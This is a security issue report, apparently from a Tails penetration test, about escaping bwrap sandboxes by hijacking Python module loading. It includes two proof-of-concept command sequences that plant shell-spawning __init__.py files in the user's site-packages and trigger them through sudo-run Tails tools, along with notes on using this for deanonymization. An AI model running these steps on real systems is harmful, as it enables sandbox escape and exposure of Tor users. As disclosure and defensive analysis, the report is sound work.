Skip to content

LPE from bwrap

https://git.radicallyopensecurity.com/otf/pen-tails/-/issues/2

tl;dr: afaik this does not immediately lead to the attacker becoming root, but is a promising start

User impact

An adversary who can already execute arbitrary code as the amnesia user can leverage this vulnerability to execute arbitrary code in the privileged contexts where these apps are running:

  • Unsafe Browser → may allow to connect to the Internet without going through Tor
  • Tor Connection → may allow to configure Tor
  • Tor Browser → may allow to monitor web browsing activity

In addition, the combination of these capabilities likely provides enough building blocks for successful deanonymization in the form of mapping specific Tor activity to a non-Tor IP address, and exfiltration of the results.

Similarly to #20709 (closed), we already accepted at least some of these risks in general, so the big difference here is the ability to do all these activities without it being visible on the desktop.

Practical exploitation path

Probably not from AppArmor-sandboxed apps (exploitation requires write access to /home/amnesia/.local/).

From ROS

I think I found a universal way to get into the bwrap sandboxes ^^ that using python3 e.g. /usr/local/bin/tca. Since it runs in the context of the /usr/lib/python3/dist-packages/tca/application.py, it would be possible to get access to the inherit FD, including the higher privileges sockets and the network namespaces, that were open before the cap drop to the amensia user happens, which can be seen here:

amnesia    20765  0.0  0.0   2576   912 pts/5    S    21:57   0:00 /bin/sh /usr/local/lib/run-with-ibus-and-a11y-bus-proxy -- /usr/bin/python3 /usr/lib/python3/dist-packages/tca/application.py
amnesia    20774  0.0  0.0   3360  1072 pts/5    S    21:57   0:00 bwrap --bind / / --proc /proc --dev /dev --bind /run/user/1000/.dbus-proxy/a11y-bus-proxy.sock /run/user/1000/tails-sandbox/a11y-bus-proxy.sock 
amnesia    20775  0.0  0.1  91564 13500 pts/5    S    21:57   0:00 /usr/bin/python3 /usr/lib/python3/dist-packages/tca/application.py
amnesia    20776  0.0  0.0   2576   904 pts/5    S    21:57   0:00 sh -c /bin/sh
amnesia    20777  0.0  0.0   2576   956 pts/5    S+   21:57   0:00 /bin/sh

PoC 1

Here we can see that were are in the sandbox (amnesia user is in group of nogroup)

# create package which will we loaded later
mkdir -p /home/amnesia/.local/lib/python3.11/site-packages/stem

# drop payload
echo 'import os 
os.system("/bin/sh")
' >  /home/amnesia/.local/lib/python3.11/site-packages/stem/__init__.py

# trigger LPE
amnesia@amnesia:~$ cp -af /var/run/user/1000/user-env /tmp/foo && sudo ENVFILE=/tmp/foo /usr/local/bin/tca
$ id
uid=1000(amnesia) gid=1000(amnesia) groups=1000(amnesia),65534(nogroup)

Poc 2

mkdir -p /home/amnesia/.local/lib/python3.11/site-packages/tailslib/
cp -r /usr/lib/python3/dist-packages/tailslib /home/amnesia/.local/lib/python3.11/site-packages/

echo 'import os
print("Hello from hijacked tailslib :)") 
os.system("/bin/bash")
' >  /home/amnesia/.local/lib/python3.11/site-packages/tailslib/__init__.py

sudo /usr/local/sbin/unsafe-browser

Which yields

* Starting Unsafe Browser
Hello from hijacked Tailslib :)
amnesia@amnesia:~/.unsafe-browser/profile.default$ nano user.js # replace startup URL from the unsafe browser
exit

which will lead to deanonymization

Analysis

Potential root-cause analysis and observation made It was observed that using the command bwrap --bind / / maps the entire root file system to the amnesia user. This configuration allows the amnesia user to place files in advance that could later be exploited during execution.

Examining the order in which Python3 loads libraries reveals that it first searches for the required libraries in the current working directory (in this case, /home/amnesia). Additionally, Python also searches the current user's home directory for libraries. Consequently, external libraries, such as stem, can be manipulated by an attacker to achieve code execution.

I think it would make sense to create a full isolated sandbox with bwrap, like mounting an empty file system and then moving stuff into the directory, or it would make sense to adapt the system-wide Python3 load order ^^. This still hols for python3 root scripts ^^

anyway it need to come up with new stuff in order to pwn Tails ^^

Edited by boyska
To upload designs, you'll need to enable LFS and have an admin enable hashed storage. More information